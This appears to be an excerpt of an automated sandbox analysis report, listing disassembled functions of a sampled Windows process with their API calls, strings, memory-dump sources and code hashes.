                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 0-1980097535
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 512edeff15cd32407e76520bbeaae6a4f24bdcc236167594130c4d1bdb2022cb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0e43a23b8a6bdc9e58335a4d8efbdd9d75f7cb2c2e2baa725891fb205cff4d64
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 512edeff15cd32407e76520bbeaae6a4f24bdcc236167594130c4d1bdb2022cb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6212F1B02093519BD765DF24D889AAFB7E9FF88344F00892DF589C7292EB34D845CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00016854 Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 366timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00016896
                                                                                                                                                                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000168AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 000168BE
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000168D2
                                                                                                                                                                                                                                                                                                                                                                                                                          • realloc.MSVCRT ref: 0002A5E7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00016906,0000001F,?,00000080), ref: 00018791
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00016907
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0001698F
                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?), ref: 00016A86
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00016AAF
                                                                                                                                                                                                                                                                                                                                                                                                                          • realloc.MSVCRT ref: 00016ACA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00016AFE
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2927284792-4023967598
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91abf7cfe3e7ce116800c9ffe160880b899db2fa4078371fbf9914c7c1103a91
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eaf096dd26ca8b6bd2be4b9ed6331f9160ead8b02ae9a02658b5ceafff2b8d4c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91abf7cfe3e7ce116800c9ffe160880b899db2fa4078371fbf9914c7c1103a91
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02C1F671A002259BDB24DF64DC49AEF77B8EF46300F5441AAE90AE7141EB359EC0CF51
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024EC1 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 395fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00024F03
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00024F67
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00024F77
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00012670,?,?,?,-00000001), ref: 00024FEB
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00025103
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 0002511E
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00025141
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Find$File$CloseFirstmemset$Next
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3059144641-4282027825
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fbc856f9da526bab2457c07e193bf77342a100c51651d9fc3de90548586eaf21
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5bd50ec6915b1dd399efcc97ed3c90da32e05ca59e796b9204eb01fab1d60d03
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbc856f9da526bab2457c07e193bf77342a100c51651d9fc3de90548586eaf21
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2E13571A002299BDB34DBA8EC95BFEB3F8EF54301F4405A9E909D7181EB359E81CB54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001532E Relevance: 19.8, APIs: 13, Instructions: 272COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000002), ref: 0001539C
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f2e9faeefc3ea5210fd4a160cbb17a42ee1a6b31c4e806e6dd3834f1105b19bd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1f6ea9af001d2496e1dce12521e95d44e06afa75d73c9781a8bb43f428f597b0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2e9faeefc3ea5210fd4a160cbb17a42ee1a6b31c4e806e6dd3834f1105b19bd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08A10271A002268BDB64EF64EC85AFEB3F5EF54310F5445ADE94AD7280EB319E81CB50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003769E Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 464COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(25170B64,00000000,?), ref: 00037710
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037722
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0003E590,00002000,?,00058BF0,00000000,?,?,00018F0D), ref: 0001EC51
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 000378BC
                                                                                                                                                                                                                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000379F1
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00011F8C,00013B98), ref: 00037B15
                                                                                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,25170B64,00000000,?), ref: 00037D0D
                                                                                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00037D20
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %s $%s>$PROMPT$Unknown
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 708651206-3050974680
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5b5d4ac31152e77edba1f48f98096ba38c8af3241ac7bc1a3e6d32235dc4150c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 70e52eebef6349f3f8f786ca51170ccf2cf9ef73abd70449ade7f98e94243ed9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b5d4ac31152e77edba1f48f98096ba38c8af3241ac7bc1a3e6d32235dc4150c
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 970214B8A051158BDB75DF28CC496EAB7B9EF45300F44829EE80DE7250EB345E81CF95
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003C1FA Relevance: 19.7, APIs: 13, Instructions: 179filememorynativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0003C14E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0003C16A
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0003C17B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0003C24F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0003C270
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0003C293
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0003C2AE
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C2EF
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?), ref: 0003C324
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?), ref: 0003C370
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0003C392
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlNtStatusToDosError.NTDLL ref: 0003C39D
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0003C3A4
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0003C3B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0003C3D1
                                                                                                                                                                                                                                                                                                                                                                                                                          • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003C3E2
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: memset.MSVCRT ref: 0003C62E
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: memset.MSVCRT ref: 0003C656
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C6C7
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0003C6E6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0003C72A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 223857506-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7e1abcf57683830952293a7d924a15411c52c478601012e51244a491bb2ab339
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: af130e7223d7a6c1e898a4025e0de2df085c312492f9a4f3df8f3a8ca49cfedb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e1abcf57683830952293a7d924a15411c52c478601012e51244a491bb2ab339
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22518F75A00215ABEB169BB4DC05EBFB7BCEF48305F148169E802E7251E6349E41CBA0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019310 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 249timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0003E590,?,00002000), ref: 00019342
                                                                                                                                                                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00019356
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0001936A
                                                                                                                                                                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0001937E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 0002BC07
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 0002BD31
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 55602301-2516506544
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4069a62094de99a22ff2140f90e088d74d789eec06ed49882a59add9368a2d41
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: aa3ad87b11e5c5832e28e9f18c21b5fb4dac3b26b9b62477202c338bdf91d07f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4069a62094de99a22ff2140f90e088d74d789eec06ed49882a59add9368a2d41
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4811676A002299ADF64DF64DC54AFEB3F9EF44300F5441AAE80AEB150EB349EC1CB50
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0002589A Relevance: 15.1, APIs: 10, Instructions: 106memoryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025944
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002594B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002596C
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00025973
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0002598F
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000259B6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0003160B
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00031618
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FindHeap$AllocCloseErrorFileLastProcess$FirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3609286125-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 610b8a82cdd21b61b607836d946b13127c5928affbf299328792a5b3160a90a8
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 806e5c7379ff0a33ad14fbecf42555bb8891fe8346fe8d50069b1f4287456c09
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31A075205700EFEB148F64ED09A6E3BF5EB46337F204619E592932E0E73998419B1A
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024759 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 81filenativeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00024782
                                                                                                                                                                                                                                                                                                                                                                                                                          • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 000247D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlReleaseRelativeName.NTDLL(?), ref: 000247E0
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeUnicodeString.NTDLL(?), ref: 000247EA
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00024823: NtQueryVolumeInformationFile.NTDLL ref: 0002484F
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 0002480E
